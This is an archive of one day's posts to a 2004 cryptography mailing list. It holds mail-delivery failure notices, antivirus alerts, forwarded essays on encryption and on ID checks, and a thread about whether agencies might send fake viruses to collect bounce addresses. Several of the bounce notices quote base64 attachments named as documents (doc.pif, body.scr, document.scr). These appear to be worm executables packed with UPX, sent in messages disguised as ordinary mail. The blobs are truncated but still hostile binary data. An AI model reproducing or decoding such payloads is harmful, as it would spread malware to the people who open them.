failure notice

2004-02-03 Thread MAILER-DAEMON
Hi. This is the qmail-send program at hknet.com.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<[EMAIL PROTECTED]>:
Sorry, no mailbox here by that name. (#5.1.1)

--- Below this line is a copy of the message.

Return-Path: <[EMAIL PROTECTED]>
Received: (qmail 3244 invoked from network); 4 Feb 2004 09:09:14 +0800
Received: from unknown (HELO client2.hknet.com) ([202.67.240.185])
  (envelope-sender <[EMAIL PROTECTED]>)
  by corpms1.hknet.com (qmail-ldap-1.03) with SMTP
  for <[EMAIL PROTECTED]>; 4 Feb 2004 09:09:14 +0800
Received: from minder.net (unknown [218.18.204.7])
by client2.hknet.com (Postfix) with ESMTP id 401D633E6F
for <[EMAIL PROTECTED]>; Wed,  4 Feb 2004 09:09:13 +0800 (HKT)
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: test
Date: Wed, 4 Feb 2004 09:09:01 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_NextPart_000__1D31CB2E.77868D47"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <[EMAIL PROTECTED]>

This is a multi-part message in MIME format.

--=_NextPart_000__1D31CB2E.77868D47
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit

The message contains Unicode characters and has been sent as a binary attachment.


--=_NextPart_000__1D31CB2E.77868D47
Content-Type: application/octet-stream;
name="doc.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="doc.zip"

UEsDBAoAACAJRDDKJx+eAFgAAABYAAAHZG9jLnBpZk1akAADBP//AAC4
AEAAAKgA

AFBFAABMAQMA4AAP
AQsBBwAAUBBgAABgvgAAAHDAAEoAABACAAAEAAQA
ANAQAgAAEAAAEAAQAAAQEAAA6MEAADAB
wAAA6AEA
VVBY
MAAAYBAABAAAgAAA4FVQWDEAAFBwUAAA
AAQAAEAAAOAucnNyYwAQwAQAAABUAABA
AADA






ADEu
MjQAVVBYIQwJAglIfomP1DYcgSmWAABTTgAAAIAAACYBAMXuhwKSAFAmSgBAA/2yaZosEAT0JegB
AEvOaZpu2R/IKsADuLCopmmapqCYkIiAmqZpmnhwaGBYUM1gn2lIAEQHODA0TdN0AygkHBgQ0yy7
1wgjA/gp8OhN0zRN4NjQyLy0NE3TNKyknJSMzjZN04h8cGgpb1ym6ZrBB1RMA0Q4mqZpmiwkHBQM
BGmazm38KH8D9OzkpmmaptzUzMi8mqZpmrSspKCYkGebpmmMgHhwKHto3mzTdQdcA1RMKP/7C3a2
++NADzQo9ywvA5qmGfkkKEocFAwEaZrO7Jv8JwPs6OCmaZqm2NTMyMCapmm6uCewrKigmGmapmmU
jIiEfKRpmqZ0bGRcVGmaphtMA0RAODCmaZqmKCAYEAiapnObAPgmzwPo4Nhnm85tVDRDA0A0NNuK
/51a0Nrl9AYfM05sck7YApdfksgBPXy+Q0uW5DWJ4DqX//dawCmVBHbrY95c3WHocv+P
IrhR7Ywu03sm1A058Kpn/yfqsHlFFOa7k25MLRH44s+/sqihnZyeo6u2xNXpABo3/1d6
oMn1JFaLw/48fcEIUp/vQpjxTawOc9tGtCWZEIoH/4cKkBmlpaj+8sPSqPgSLEprj7bgDT1w
pt8bWnzhJ1XJ/xJgvhhl1TieF3PiVIlBvJrjP8ZQjW0Alk/LagyxQ3qy/3MXzohHBciK
VyPyxJlxTC4L79bArZ2Qhg97enyRiZSi/7PH3voVNVh+p8MCNHmh3Bpbj+Ywbc0gds8rivxR
uSSS/wN37mjlZehul4ODdoyVobDC1+8KKEltlL7rG06Evfk4/3q/B1Kg8UVsllOzGnzl
UcAypx+aGJkdpC67S950DalI/+qPN+KQQfWsZiPjpmw1AdCid08qCOnNtJ6Le25kXVlY
/1pfZ3KAkaW81vMTNlyFseASR3+6+Dl9xA5bq/5UrQk9/5p3pwJw4VXMBsNDxlzVYWFkanN/
jKC1zegGJ0tynMn5/yxim1cWWH2wYCb+I3rUMZHkWsMvzhCF/XT2d/uADJkp/7xS64cm
yG0VwG4fk4pE4ZTUEiHfroBVLRjmx6vyfGlZ/05COzc4OD1FUF5vg5q00fEUOmPPvvDlbLbk
I1v3vGGo/9A7ie5zPGP4meDFS5EXoSHeIrM/P1RIUXtvftbP2W6V/9/+/ykDI+mUCb/m86VB
EKZ8MmlrgCELLcdO0hCCbPn/c6d33hSHBwf7UqoBYcAsm/cmlt2XnSJgD0aezf0sQH//
k7LS8QkgWHZoY11QUlFTamR3ASzF71QwvFcRPM6dV27/IOOtYNrRUhXOZl+3QcAU5GWTn3j+
cg2852qVe3sTdnb/fRwNLfL29LDx0ed5+t1MZaP/J2yM3QvbjBupvXWHO0//2xSCQhQJ
RcyCD/pitylz+xWD5x6TfrQkaSn/vSjL6k7//+3/dw46sL/3VNTsc5gBTQad8qKvwmLz5V433wVx
Uv8H+BtAflQ+p6lPLAJ9MMjnBtJUKhprTAGdBPZq+h3HBv+F///4HZAEq5YABgYQK++Z1E7/
F3gLk8b4dSGMpP9f/8xya+tv/qX97NBByXiR2cSsJsfo4Km3Gl1v7CkQo/+88+31b1Eh
NY3WUxxIKRjjt1w/nbjN0FJV47VD6r5n4/+goDLizkk6JC8wCo+uhOF1QKFimLL1MErg4/+R
gcEnB/93iGePVLOFCOL+gkWrYY502rsqOK7wStQYnBeKSMK1vP+e+x9W5m6Q4DtHs6Aa
t9KqvMT3k0imAcAE/wYSi12p2P+9lDH4H+haYz7f1grKQtUMXmBJcvX0rvRTF/wWFfKOmv//
//9zcDyCseKON1tTFqInlFRYrLE1Nz

Delivery Status Notification (Failure)

2004-02-03 Thread postmaster
This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

   [EMAIL PROTECTED]



Reporting-MTA: dns;qsmcms1.quantacn.com
Received-From-MTA: dns;minder.net
Arrival-Date: Wed, 4 Feb 2004 09:04:25 +0800

Final-Recipient: rfc822;[EMAIL PROTECTED]
Action: failed
Status: 5.1.1
--- Begin Message ---


<>
--- End Message ---


failure notice

2004-02-03 Thread MAILER-DAEMON
Hi. This is the qmail-send program at hknet.com.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<[EMAIL PROTECTED]>:
Sorry, no mailbox here by that name. (#5.1.1)

--- Below this line is a copy of the message.

Return-Path: <[EMAIL PROTECTED]>
Received: (qmail 19433 invoked from network); 4 Feb 2004 08:10:36 +0800
Received: from unknown (HELO client2.hknet.com) ([202.67.240.185])
  (envelope-sender <[EMAIL PROTECTED]>)
  by corpms2.hknet.com (qmail-ldap-1.03) with SMTP
  for <[EMAIL PROTECTED]>; 4 Feb 2004 08:10:36 +0800
Received: from minder.net (unknown [218.18.204.7])
by client2.hknet.com (Postfix) with ESMTP id 4AB8133E6C
for <[EMAIL PROTECTED]>; Wed,  4 Feb 2004 08:10:35 +0800 (HKT)
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: hello
Date: Wed, 4 Feb 2004 08:10:24 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_NextPart_000_0002_19A588AD.50CBBBE3"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <[EMAIL PROTECTED]>

This is a multi-part message in MIME format.

--=_NextPart_000_0002_19A588AD.50CBBBE3
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit

¼šÈe<ß
×Qw!Ðe‘gÒØÌý’š¡¼h~®>²f·>{îNŠâ‡ÈD«‹ÞLgHOjçѦ¾o®BïÀ‹"Å$‰\úgЖ‡ï¨£à[ä]ºHú0‡Ë]~o¨sÎÜ7<)Izc˜úý–gà_C̯ˆuuh¼4Eþw"صÁºB³†7\Ç%ˆ·
Íç“òÏ$³É±!æ6Ù'¤‹^‰Ú%‘׌°]§*78Su”Äù¾Uù7™#ϾˆR‰¢áG*B?
¢I¬×6ŒÜó)S»‘&1蒖9‡åýë(V.È%Iðäh©½¼¯Â•BOԊ*84ö¬ŒˆÚÛBaïºô ͘1\q`¢ø•}Èq$¸„b†õ¹[o‡<àW—
~äq§
{È×,Ëf"aO®çO6Õm÷Uƒ(÷ÌƦb/
oA¯¢-έ™0”‘[$|'](âþš˜)Ì}ýÖp4(T”œVó6â`ëæ*rÏqòµ<œ’
/4÷ÜÞoíw¢s…‰uX¾ðs•àÒ0Â`šc{—wháBÚ½ú†ÊáQ¡Â¾ÏöäX˜µ±ƒ~´ò~à˜;¹²%àx¶³%„Úp©ÈûÍ8O¶k„ôs_lÜÝ»R_C㣯Ù`²9ω„*ÕíÏ÷S‡')Kr5^L3äó­
?é7øbgÏÖ)(,5ò2…B0sŸö:Ÿ¾WÇå¯áð.*½¡£p”Á¼ú}kK™”Z·0
4\â_™


--=_NextPart_000_0002_19A588AD.50CBBBE3
Content-Type: application/octet-stream;
name="body.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="body.zip"

UEsDBAoAAEwBRDDKJx+eAFgAAABYAAAIYm9keS5zY3JNWpAAAwQAAAD//wAAuAAA
AABAAACo

AABQRQAATAEDAOAA
DwELAQcAAFAQYAAAYL4AAABwwABKAAAQAgAABAAE
AADQEAIAABAAABAAEAAAEBAAAOjBAAAwAQAA
AMAAAOgB
AFVQ
WDAAAGAQAAQAAIAAAOBVUFgxAABQcFAA
AAAEAABAAADgLnJzcmMAEMAEVAAA
QAAAwAAA






AAAx
LjI0AFVQWCEMCQIJSH6Jj9Q2HIEplgAAU04AAACmAQDF7ocCkgBQJkoAQAP9smmaLBAE9CXo
AQBLzmmabtkfyCrAA7iwqKZpmqagmJCIgJqmaZp4cGhgWFDNYJ9pSABEBzgwNE3TdAMoJBwYENMs
u9cIIwP4KfDoTdM0TeDY0Mi8tDRN0zSspJyUjM42TdOIfHBoKW9cpumawQdUTANEOJqmaZosJBwU
DARpms5t/Ch/A/Ts5KZpmqbc1MzIvJqmaZq0rKSgmJBnm6ZpjIB4cCh7aN5s03UHXANUTCj/+wt2
tvvjQA80KPcsLwOaphn5JChKHBQMBGmazuyb/CcD7OjgpmmaptjUzMjAmqZpurgnsKyooJhpmqZp
lIyIhHykaZqmdGxkXFRpmqYbTANEQDgwpmmapiggGBAImqZzmwD4Js8D6ODYZ5vObVQ0QwNANDTb
iv+dWtDa5fQGHzNObHJO2AKXX5LIAT18vkNLluQ1ieA6l//3WsAplQR262PeXN1h6HL/
jyK4Ue2MLtN7JtQNOfCqZ/8n6rB5RRTmu5NuTC0R+OLPv7KooZ2cnqOrtsTV6QAaN/9X
eqDJ9SRWi8P+PH3BCFKf70KY8U2sDnPbRrQlmRCKB/+HCpAZpaWo/vLD0qj4EixKa4+24A09
cKbfG1p84SdVyf8SYL4YZdU4nhdz4lSJQbya4z/GUI1tAJZPy2oMsUN6sv9zF86IRwXI
ilcj8sSZcUwuC+/WwK2dkIYPe3p8kYmUov+zx976FTVYfqfDAjR5odwaW4/mMG3NIHbPK4r8
Ubkkkv8Dd+5o5WXobpeDg3aMlaGwwtfvCihJbZS+6xtOhL35OP96vwdSoPFFbJZTsxp8
5VHAMqcfmhiZHaQuu0vedA2pSP/qjzfikEH1rGYj46ZsNQHQondPKgjpzbSei3tuZF1ZWP//
//9aX2dygJGlvNbzEzZchbHgEkd/uvg5fcQOW6v+VK0JPf+ad6cCcOFVzAbDQ8Zc1WFhZGpz
f4ygtc3oBidLcpzJ+f8sYptXFlh9sGAm/iN61DGR5FrDL84Qhf109nf7gAyZKf+8UuuH
JshtFcBuH5OKROGU1BIh366AVS0Y5ser8nxpWf9OQjs3ODg9RVBeb4OatNHxFDpjz77w5Wy2
5CNb97xhqP/QO4nuczxj+JngxUuRF6Eh3iKzPz9USFF7b37Wz9lulf/f/v8pAyPplAm/5vOl
QRCmfDJpa4AhCy3HTtIQgmz5/3Ond94UhwcH+1KqAWHALJv3Jpbdl50iYA9Gns39LEB/
/5Oy0vEJIFh2aGNdUFJRU2pkdwEsxe9UMLxXETzOnVdu/yDjrWDa0VIVzmZft0HAFORlk594
/nINvOdqlXt7E3Z2/30cDS3y9vSw8dHnefrdTGWj/ydsjN0L24wbqb11hztP/9sUgkIU
CUXMgg/6Yrcpc/sVg+cek360JGkp/70oy+pO///t/3cOOrC/91T

Delivery Status Notification (Failure)

2004-02-03 Thread postmaster
This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

   [EMAIL PROTECTED]



Reporting-MTA: dns;ewmdcusa.ewmfg.com
Received-From-MTA: dns;minder.net
Arrival-Date: Tue, 3 Feb 2004 19:01:48 -0500

Final-Recipient: rfc822;[EMAIL PROTECTED]
Action: failed
Status: 5.1.1
--- Begin Message ---
The message contains Unicode characters and has been sent as a binary attachment.

<>
--- End Message ---


Mail delivery failed: returning message to sender

2004-02-03 Thread Mail Delivery System
This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  [EMAIL PROTECTED]
SMTP error from remote mailer after end of data:
host mail.sourceforge.net [66.35.250.206]: 550 This message contains an unwanted 
file extension (scr)

-- This is a copy of the message, including all the headers. --
-- The body of the message is 30977 characters long; only the first
-- 16384 or so are included here.

Return-path: <[EMAIL PROTECTED]>
Received: from adsl-146-171.wanadoo.be ([213.177.146.171]:3592 helo=minder.net)
by externalmx.vasoftware.com with esmtp (Exim 4.24 #1 (Debian))
id 1Ao9iK-0003OK-07
for <[EMAIL PROTECTED]>; Tue, 03 Feb 2004 15:12:16 -0800
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Hello
Date: Wed, 4 Feb 2004 00:11:09 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_NextPart_000_0012_781E7962.F7D01A32"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <[EMAIL PROTECTED]>

This is a multi-part message in MIME format.

--=_NextPart_000_0012_781E7962.F7D01A32
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit

The message cannot be represented in 7-bit ASCII encoding and has been sent as a 
binary attachment.


--=_NextPart_000_0012_781E7962.F7D01A32
Content-Type: application/octet-stream;
name="document.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="document.scr"

TVqQAAME//8AALgAQAAA
qAAA
UEUA
AEwBAwDgAA8BCwEHAABQEGAAAGC+cMAASgAAEAAA
AAIAAAQABAAA0BACAAAQAAAQABAAABAQ
AADowQAAMAEAAADAAADoAQAA

AABVUFgwAABgEAAEAACAAADg
VVBYMQAAUHBQBAAAQAAA4C5yc3JjABDA
BFQAAEAAAMAA







MS4yNABVUFghDAkCCUh+iY/UNhyBKZYAAFNOgAAAJgEAxe6H
ApIAUCZKAEAD/bJpmiwQBPQl6AEAS85pmm7ZH8gqwAO4sKimaZqmoJiQiICapmmaeHBoYFhQzWCf
aUgARAc4MDRN03QDKCQcGBDTLLvXCCMD+Cnw6E3TNE3g2NDIvLQ0TdM0rKSclIzONk3TiHxwaClv
XKbpmsEHVEwDRDiapmmaLCQcFAwEaZrObfwofwP07OSmaZqm3NTMyLyapmmatKykoJiQZ5umaYyA
eHAoe2jebNN1B1wDVEwo//sLdrb740APNCj3LC8DmqYZ+SQoShwUDARpms7sm/wnA+zo4KZpmqbY
1MzIwJqmabq4J7CsqKCYaZqmaZSMiIR8pGmapnRsZFxUaZqmG0wDREA4MKZpmqYoIBgQCJqmc5sA
+CbPA+jg2Gebzm1UNEMDQDQ024r/nVrQ2uX0Bh8zTmxyTtgCl1+SyAE9fL5DS5bkNYngOpf/
91rAKZUEdutj3lzdYehy/48iuFHtjC7TeybUDTnwqmf/J+qweUUU5ruTbkwtEfjiz7+y
qKGdnJ6jq7bE1ekAGjf/V3qgyfUkVovD/jx9wQhSn+9CmPFNrA5z20a0JZkQigf/hwqQ
GaWlqP7yw9Ko+BIsSmuPtuANPXCm3xtafOEnVcn/EmC+GGXVOJ4Xc+JUiUG8muM/xlCNbQCW
T8tqDLFDerL/cxfOiEcFyIpXI/LEmXFMLgvv1sCtnZCGD3t6fJGJlKL/s8fe+hU1WH6n
wwI0eaHcGluP5jBtzSB2zyuK/FG5JJL/A3fuaOVl6G6Xg4N2jJWhsMLX7wooSW2UvusbToS9
+Tj/er8HUqDxRWyWU7MafOVRwDKnH5oYmR2kLrtL3nQNqUj/6o834pBB9axmI+OmbDUB
0KJ3TyoI6c20not7bmRdWVj/Wl9ncoCRpbzW8xM2XIWx4BJHf7r4OX3EDlur/lStCT3/
mnenAnDhVcwGw0PGXNVhYWRqc3+MoLXN6AYnS3Kcyfn/LGKbVxZYfbBgJv4jetQxkeRawy/O
EIX9dPZ3+4AMmSn/vFLrhybIbRXAbh+TikThlNQSId+ugFUtGObHq/J8aVn/TkI7Nzg4
PUVQXm+DmrTR8RQ6Y8++8OVstuQjW/e8Yaj/0DuJ7nM8Y/iZ4MVLkRehId4isz8/VEhRe29+
1s/ZbpX/3/7/KQMj6ZQJv+bzpUEQpnwyaWuAIQstx07SEIJs+f9zp3feFIcHB/tSqgFhwCyb
9yaW3ZedImAPRp7N/SxAf/+TstLxCSBYdmhjXVBSUVNqZHcBLMXvVDC8VxE8zp1Xbv8g
461g2tFSFc5mX7dBwBTkZZOfeP5yDbznapV7exN2dv99HA0t8vb0sPHR53n63Uxlo/8nbIzd
C9uMG6m9dYc7T//bFIJCFAlFzIIP+mK3KXP7FYPnHpN+tCRpKf+9KMvqTv//7f93Djqwv/dU
1OxzmAFNBp3yoq/CYvPlXjffBXFS/wf4G0B+VD6nqU8sAn0wyOcG0lQqGmtMAZ0E9mr6HccG
/4X///gdkASrlgAGBhAr75nUTv8XeAuTxvh1IYyk/1//zHJr62/+pf3s0EHJeJHZxKwmx+jg
qbcaXW/sKRCj/7zz7fVvUSE1jdZTHEgpGOO3XD+duM3QUlXjtUPqvmfj/6CgMuLOSTok
LzAKj66E4XVAoWKYsvUwSuDj/5GBwScH/3eIZ49Us4UI4v6CRathjnTauyo4rvBK1BicF4pI
wrW8/577H1bmbpDgO0ezoBq30qq8xPeTSKYBwAT/BhKLXanY/72UMfgf6FpjPt/WCspC
1QxeYEly9fSu9FMX/BYV8o6a/3NwPIKx4o43W1MWoieUVFissTU3Pqp1

[IP] Are terrorists using encryption to cloak their secrets? (fwd from dave@farber.net)

2004-02-03 Thread Eugen Leitl
- Forwarded message from Dave Farber <[EMAIL PROTECTED]> -

From: Dave Farber <[EMAIL PROTECTED]>
Date: Tue, 03 Feb 2004 15:26:52 -0500
To: [EMAIL PROTECTED]
Subject: [IP] Are terrorists using encryption to cloak
  their secrets?
X-Mailer: munch
X-Mailer: QUALCOMM Windows Eudora Version 6.0.2.0
Reply-To: [EMAIL PROTECTED]


Delivered-To: [EMAIL PROTECTED]
Date: Tue, 03 Feb 2004 13:44:02 -0500
From: Declan McCullagh <[EMAIL PROTECTED]>
---

Date: Mon,  2 Feb 2004 10:20:36 -0500
From: "Matthew S. Hamrick" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Are Terrorists Using Crypto?

Once again I've had to defend the domestic use of encryption technology. My
latest "opinion" is at
http://www.cryptonomicon.net/modules.php?name=News&file=article&sid=645 . I
don't know if it's of any value to either of you guys, but I thought I would
pass it along anyway.

-Matt H.

-- 
One Ringtone to rule them all, one Carrier to find them,
One Phone to bring them all and to the Service Contract bind them.

__

-
You are subscribed as [EMAIL PROTECTED]
To manage your subscription, go to
 http://v2.listbox.com/member/?listname=ip

Archives at: http://www.interesting-people.org/archives/interesting-people/

- End forwarded message -
-- Eugen* Leitl http://leitl.org";>leitl
__
ICBM: 48.07078, 11.61144http://www.leitl.org
8B29F6BE: 099D 78BA 2FD3 B014 B08A  7779 75B0 2443 8B29 F6BE
http://moleculardevices.org http://nanomachines.net



Norton AntiVirus failed to scan an attachment in a message you se nt.

2004-02-03 Thread NAV for Microsoft Exchange-SRVRESTONMAIL
Recipient of the attachment:  Randy Thompson\Inbox
Subject of the message:  Hi
No action was taken on the attachment.
  Attachment body.zip was Logged Only for the following reasons:
Scan Engine Failure (0x80004005)
<>

[IP] Bruce Schneier on ID cards and the "illusion of security" (fwd from dave@farber.net)

2004-02-03 Thread Eugen Leitl
- Forwarded message from Dave Farber <[EMAIL PROTECTED]> -

From: Dave Farber <[EMAIL PROTECTED]>
Date: Tue, 03 Feb 2004 15:28:45 -0500
To: [EMAIL PROTECTED]
Subject: [IP] Bruce Schneier on ID cards and the
  "illusion of security"
X-Mailer: munch
X-Mailer: QUALCOMM Windows Eudora Version 6.0.2.0
Reply-To: [EMAIL PROTECTED]


http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2004/02/03/EDGSI4M3171.DTL&type=printable

 How We Are Fighting the War on Terrorism
 IDs and the illusion of security
 Bruce Schneier
 Tuesday, February 3, 2004
 San Francisco Chronicle | Feedback | FAQ


 In recent years there has been an increased use of identification checks
as a security measure. Airlines always demand photo IDs, and hotels
increasingly do so. They're often required for admittance into government
buildings, and sometimes even hospitals. Everywhere, it seems, someone is
checking IDs. The ostensible reason is that ID checks make us all safer,
but that's just not so. In most cases, identification has very little to do
with security.

 Let's debunk the myths:

 First, verifying that someone has a photo ID is a completely useless
security measure. All the Sept. 11 terrorists had photo IDs. Some of the
IDs were real. Some were fake. Some were real IDs in fake names, bought
from a crooked DMV employee in Virginia for $1,000 each. Fake driver's
licenses for all 50 states, good enough to fool anyone who isn't paying
close attention, are available on the Internet. Or if you don't want to buy
IDs online, just ask any teenager where to get a fake ID.

 Harder-to-forge IDs only help marginally, because the problem is not
making sure the ID is valid. This is the second myth of ID checks: that
identification combined with profiling can be an indicator of intention.

 Our goal is to somehow identify the few bad guys scattered in the sea of
good guys. In an ideal world, what we would want is some kind of ID that
denotes intention. We'd want all terrorists to carry a card that says
"evildoer" and everyone else to carry a card that said "honest person who
won't try to hijack or blow up anything." Then, security would be easy. We
would just look at people's IDs and, if they were evildoers, we wouldn't
let them on the airplane or into the building.

 This is, of course, ridiculous, so we rely on identity as a substitute. In
theory, if we know who you are, and if we have enough information about
you, we can somehow predict whether you're likely to be an evildoer. This
is the basis behind CAPPS-2, the government's new airline passenger
profiling system. People are divided into two categories based on various
criteria: the traveler's address, credit history and police and tax
records; flight origin and destination; whether the ticket was purchased by
cash, check or credit card; whether the ticket is one way or round trip;
whether the traveler is alone or with a larger party; how frequently the
traveler flies; and how long before departure the ticket was purchased.

 Profiling has two very dangerous failure modes. The first one is obvious.
Profiling's intent is to divide people into two categories: people who may
be evildoers and need to be screened more carefully, and people who are
less likely to be evildoers and can be screened less carefully.

 But any such system will create a third, and very dangerous, category:
evildoers who don't fit the profile. Oklahoma City bomber Timothy McVeigh,
Washington-area sniper John Allen Muhammed and many of the Sept. 11
terrorists had no previous links to terrorism. The Unabomber taught
mathematics at UC Berkeley. The Palestinians have demonstrated that they
can recruit suicide bombers with no previous record of anti-Israeli
activities. Even the Sept. 11 hijackers went out of their way to establish
a normal-looking profile; frequent-flier numbers, a history of first-class
travel and so on. Evildoers can also engage in identity theft, and steal
the identity -- and profile -- of an honest person. Profiling can result in
less security by giving certain people an easy way to skirt security.

 There's another, even more dangerous, failure mode for these systems:
honest people who fit the evildoer profile. Because evildoers are so rare,
almost everyone who fits the profile will turn out to be a false alarm.
This not only wastes investigative resources that might be better spent
elsewhere, but it causes grave harm to those innocents who fit the profile.
Whether it's something as simple as "driving while black" or "flying while
Arab," or something more complicated such as taking scuba lessons or
protesting the Bush administration, profiling harms society because it
causes us all to live in fear...not from the evildoers, but from the police.

 Security is a trade-off; we have to weigh the security we get against the
price we pay for it. Better trade-offs are to spend money on intelligence
and analysis, investigation and making ourselves less of a pariah on the
world stage. And to spend

Your message to xmlsec awaits moderator approval

2004-02-03 Thread xmlsec-admin
Your mail to 'xmlsec' with the subject

TEST

Is being held until the list moderator can review it for approval.

The reason it is being held:

Post by non-member to a members-only list

Either the message will get posted to the list, or you will receive
notification of the moderator's decision.



RE: Email you sent to rthompson@domce.com

2004-02-03 Thread postmaster
To counterract SPAM, Dominion requests you confirm your first message to [EMAIL 
PROTECTED], by clicking on the link below . . .

http://mail.domce.com/verify.asp?messageid=A586CD97AEEF7A43A4225EBACB44F73D

Subject: Hi
Date / Time: 2/3/2004 3:35:30 PM

You will need to repeat this task the first time you send an e-mail message to an 
employee at Dominion.  If you are a client with a registered domain name (i.e. 
@domce.com), we can add this domain to a safe list.  You will then be able to send a 
message to any employee at Dominion without confirmation.

We apologize for any inconvenience this may cause.  Unfortunately, SPAM has grown from 
mere nuisance to productivity-killer.  By requesting that the sender confirm his or 
her message, all automated, unwanted e-mail is automatically discarded.

If you have any questions, please contact our IT Director, Brad Wilkins, via phone.

Thank you,
Dominion Consulting Engineers, P.C.

http://mail.domce.com/verify.asp?messageid=A586CD97AEEF7A43A4225EBACB44F73D

*VERGL (Verified Embedded Random Generated Link) VERGL is a patent-pending technology 
and is in compliance with the Americans with Disabilities Act.

Copyright 1998 www.Mail-Block.com a Division of Directpop.net




Undeliverable: HI

2004-02-03 Thread System Administrator
Your message

  To:  [EMAIL PROTECTED]
  Subject: HI
  Sent:Tue, 3 Feb 2004 12:24:18 -0700

did not reach the following recipient(s):

[EMAIL PROTECTED] on Tue, 3 Feb 2004 12:23:31 -0700
The recipient name is not recognized
The MTS-ID of the original message is: c=us;a=
az;p=state;l=DCSEMSG010402031923D83F4J1T
MSEXCH:IMS:AZDES:OTS:DCSEMSG01 0 (000C05A6) Unknown Recipient


--- Begin Message ---
The message cannot be represented in 7-bit ASCII encoding and has been sent
as a binary attachment.




alert.txt
Description: Binary data
--- End Message ---


List Post failure

2004-02-03 Thread [EMAIL PROTECTED]

Your posting to the list [EMAIL PROTECTED] has been returned to
you because you are not a member of the list. Only members of this list

are allowed to post to it.
Please contact [EMAIL PROTECTED] if you have any problems.

The message headers and first 50 body lines follow:

--- Begin Message ---
Mail transaction failed. Partial message is available.

<>
--- End Message ---


Re: Cypherpunks response to viral stimuli

2004-02-03 Thread Tyler Durden
"Or would you instead, simply just stick a Carnivore machine at one hop 
above each CDR node that you're interested in, and gather the information 
you wanted with nearly zero risk of tipping your hand?  Or even simpler than 
that, get a hotmail or yahoomail account and just subscribe.  Which of the 
above scenarios makes the most sense in terms of Occam's?"

While you make some good points, you've way overstated both sides of your 
argument.
But this statement..."simply stick a Carnivore machine at one hop above each 
CDR node"...
Isn't that almost like saying "simply splice into the undersea cable"? Of 
course, if we're talking about hunting down Osama bin Laden a TLA (or 
whoever) would probably do that. But in terms of merely rounding up the 
names of potential trouble makers (particularly when they don't want anyone 
to know that they're doing this) it seems to be an awfully easy thing to do.

As for the fake virus part, all they need to do is go to some year-old virus 
list, select a virus, and send one directly through a non-de-mimed list 
server, and then watch what comes out. Seems a lot cheaper and easier.

But this misses the point: Even IF this would be "stupid", it would be 
stupider still to be aware that this is possible, and then not implement a 
fix (if a cheap fix is available). De-miming is now obvious.
In other words, the idea is not to compare dick sizes but to actually force 
them to spend huge amounts of money on trivial tasks, by raising aware of 
and plugging any holes that become evident. That assymetry is exactly what 
crypto is, in a nutshell.

-TD



From: sunder <[EMAIL PROTECTED]>
To: Tyler Durden <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Cypherpunks response to viral stimuli
Date: Tue, 03 Feb 2004 13:28:47 -0500
Tyler Durden wrote:

And in case it's not clear, I'm suggesting that it may be useful for them 
to deliberately create a "fake" virus that is easily detectable, and so 
cull the bounce messages.
Right, why should they do something passive that doesn't tip their hand and 
allows them to collect the information they need, when instead they can do 
something active and stupid that could possibly give away their position.

Think about it.  In fact, apply Occam's Razor to this, in fine, thin 
slices:

If you were a TLA and you'd want to send a "fake" virus, it would need to 
be something that would trip every anti-virus software that anyone could 
possibly run, but yet, not be a virus, and you'd need to do so without 
giving away your IP address - while making it look like it came from lots 
of sources.  If you'd only use a single IP address, the guy that runs the 
node would likely block you as a virus source.

Then, on top of it, you'd have to *HOPE* that none of your targets saw the 
real version of the virus, and then bothered to compare the two, or worse 
yet, dissect the decoy you've sent, and figure out that it isn't real.

How's would you do this and have it be successful?  Unless, of course, you 
wish to claim that the TLA's wrote the anti-SCO viruses?  In which case, 
there's a lovely bridge between Brooklyn and Manhattan that I would gladly 
sell you...  Real cheap...  it's a bit old, but it's in decent shape... No? 
 How about some nice foil hats?  Real cheap...  For you, only $100 each 
(plus tax of course)... guaranteed to be made of 100% aluminum foil.

Or would you instead, simply just stick a Carnivore machine at one hop 
above each CDR node that you're interested in, and gather the information 
you wanted with nearly zero risk of tipping your hand?  Or even simpler 
than that, get a hotmail or yahoomail account and just subscribe.  Which of 
the above scenarios makes the most sense in terms of Occam's?

P.S.: I stand by my original statement: the collective IQ of the posters on 
list is dropping.
_
Check out the new MSN 9 Dial-up — fast & reliable Internet access with prime 
features! http://join.msn.com/?pgmarket=en-us&page=dialup/home&ST=1



Hi

2004-02-03 Thread beikrem
The message contains Unicode characters and has been sent as a binary attachment.

<>


[no subject]

2004-02-03 Thread MAILsweeper
The message sent to [EMAIL PROTECTED]
 with the subject:

... contained a virus and has been blocked.  Please check your systems.



MDaemon Warning - Virus Found

2004-02-03 Thread postmaster
The following message had attachment(s) which contained viruses:

>From  : [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject   : 
Date  : Tue, 3 Feb 2004 13:46:43 -0500
Message-ID: 

AttachmentVirus name   Action taken
--
body.zip  ???  Removed




Re: Cypherpunks response to viral stimuli

2004-02-03 Thread sunder
Tyler Durden wrote:

And in case it's not clear, I'm suggesting that it may be useful for 
them to deliberately create a "fake" virus that is easily detectable, 
and so cull the bounce messages.
Right, why should they do something passive that doesn't tip their hand and 
